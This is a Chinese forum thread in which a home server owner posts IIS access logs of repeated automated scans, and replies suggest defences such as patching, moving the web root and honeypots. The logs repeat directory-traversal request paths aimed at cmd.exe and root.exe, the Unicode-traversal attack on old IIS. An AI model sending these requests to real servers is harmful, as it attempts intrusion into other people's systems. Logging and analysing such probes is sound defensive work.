我的机器遭受攻击的纪录。这个家伙用了一个自动攻击程序。我刚刚开放80端口一个小时就被他嗅到了。

07:19:25 61.172.21.122 GET /scripts/root.exe 404
07:19:25 61.172.21.122 GET /MSADC/root.exe 404
07:19:25 61.172.21.122 GET /c/winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /d/winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:25 61.172.21.122 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
07:19:25 61.172.21.122 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /scripts/..?../winnt/system32/cmd.exe 500
07:19:25 61.172.21.122 GET /scripts/..?../winnt/system32/cmd.exe 404
07:19:26 61.172.21.122 GET /winnt/system32/cmd.exe 404
07:19:26 61.172.21.122 GET /winnt/system32/cmd.exe 404
07:19:26 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:26 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:26 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:26 61.172.21.122 GET /scripts/..%2f../winnt/system32/cmd.exe 500
07:27:21 61.149.10.234 GET /scripts/root.exe 404
07:27:28 61.149.10.234 GET /MSADC/root.exe 404
07:27:32 61.149.10.234 GET /c/winnt/system32/cmd.exe 404
07:27:44 61.149.10.234 GET /d/winnt/system32/cmd.exe 404
07:27:48 61.149.10.234 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:27:51 61.149.10.234 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
07:27:55 61.149.10.234 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
07:27:58 61.149.10.234 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 404
07:28:02 61.149.10.234 GET /scripts/..?../winnt/system32/cmd.exe 500
07:28:08 61.149.10.234 GET /scripts/..?../winnt/system32/cmd.exe 404
07:28:12 61.149.10.234 GET /winnt/system32/cmd.exe 404
07:28:19 61.149.10.234 GET /winnt/system32/cmd.exe 404
07:33:20 61.188.170.31 GET /scripts/root.exe 404
07:33:24 61.188.170.31 GET /MSADC/root.exe 404

解决方案 »

  1.   

    你的IIS的目录是不是默认的c:\interpub\wwwroot?
      

  2.   

    我把目录改掉了,指向:\inetpub\test。这个程序比较笨,挨个尝试IIS的缺省目录和C/D根目录。我装了防火墙,留下了80端口对外开放。to mylin2002
    访问纪录在winnt\system32\logfiles\下面i'm online: [email protected]
      

  3.   

    to xglcm:我就是不知道怎么对付他。发现是很容易的,IIS有日志的,每个GET都会被记录。看起来它并没有得逞,但是到现在已经第五次攻击我了,一小时一次,看来是轮流自动攻击。这个疯子不知道什么时候换个工具,就会危险。怎么办?
      

  4.   

    又来了,好像方式有点小变化。
    恐惧,就像看科幻电影一样。08:28:40 127.0.0.1 GET /c/ 403
    08:30:31 61.135.12.208 GET /scripts/root.exe 403
    08:30:36 61.135.12.208 GET /MSADC/root.exe 403
    08:30:38 61.135.12.208 GET /c/winnt/system32/cmd.exe 403
    08:30:40 61.135.12.208 GET /d/winnt/system32/cmd.exe 403
    08:30:49 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:30:51 61.135.12.208 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:30:56 61.135.12.208 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:30:58 61.135.12.208 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    08:31:01 61.135.12.208 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:02 61.135.12.208 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:05 61.135.12.208 GET /winnt/system32/cmd.exe 403
    08:31:07 61.135.12.208 GET /winnt/system32/cmd.exe 403
    08:31:09 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:15 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:17 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:19 61.135.12.208 GET /scripts/..%2f../winnt/system32/cmd.exe 403
    08:31:35 61.183.208.94 GET /scripts/root.exe 403
    08:31:45 61.183.208.94 GET /MSADC/root.exe 403
    08:31:45 61.183.208.94 GET /c/winnt/system32/cmd.exe 403
    08:31:45 61.183.208.94 GET /d/winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%2f../winnt/system32/cmd.exe 403
      

  5.   

    我是在家里ADSL上网。这个家伙的程序还会定期自动断开重新拨号,以改换地址。只要国家去查,肯定可以查到的,但是不知道哪个部门管。请大家继续关注。威胁就在我们身边。
      

  6.   

    做个honeypot到project.honeynet.org上找找,有for win的累死他。
      

  7.   

    又来了。
    真是孜孜不倦。
    别的没什么,就像癞蛤蟆趴脚上,咬不着你但是膈窨你。(Geyin这个词不会写)08:58:31 61.133.178.207 GET /scripts/root.exe 403
    08:58:38 61.133.178.207 GET /MSADC/root.exe 403
    08:58:38 61.133.178.207 GET /c/winnt/system32/cmd.exe 403
    08:58:39 61.133.178.207 GET /d/winnt/system32/cmd.exe 403
    08:58:43 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:44 61.133.178.207 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:58:44 61.133.178.207 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:58:46 61.133.178.207 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    08:58:47 61.133.178.207 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:58:49 61.133.178.207 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:58:49 61.133.178.207 GET /winnt/system32/cmd.exe 403
    08:58:51 61.133.178.207 GET /winnt/system32/cmd.exe 403
    08:58:51 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:52 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:52 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:54 61.133.178.207 GET /scripts/..%2f../winnt/system32/cmd.exe 403
      

  8.   

    LET ME SEE ,TRY my best to help you~!
      

  9.   

    Specter这个东东,可以骗他,不过你要报复他,可还要
      

  10.   

    to rujor:我看过了,好像没有下载。是不是要买?不像啊
    谢谢
      

  11.   

    也有可能是病毒,nimda就是这样利用unicode漏洞传播的。你把intpub下面的script目录删掉就可以了。如果要治本,去更新IIS和win2k到最新,让你的unicode补上
    =fly by=
      

  12.   

    to harry:我的系统总是最新的,所有补丁都打上了。肯定不是病毒。全部删掉了。但是对方不知道。就像他也不知道我的机器上并没有什么东西一样。又来了。不好意思,下次我不贴了。09:19:11 61.170.192.124 GET /scripts/root.exe 403
    09:19:11 61.170.192.124 GET /MSADC/root.exe 403
    09:19:11 61.170.192.124 GET /c/winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /d/winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..?../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..?../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%2f../winnt/system32/cmd.exe 403谢谢
      

  13.   


    因为你是ADSL拨号
    IP变动就在一个C类IP里
    估计这个家伙是一个网段一个网段扫描的
    而不是针对你的这一台机器不过你的安全好象还不错哦
    没有一个200
    哈哈这个扫描器很老了
    扫一些老漏洞
    SP2就把全补了
      

  14.   

    谢谢badwood和snsins,给我吃定心丸。
    这个扫描器看来是win2000时代或更古老的时代的作品。那时候系统的缺省安装目录是winnt明天结贴。大家都有分。分太多了,可惜总共只能给出100。谢谢大家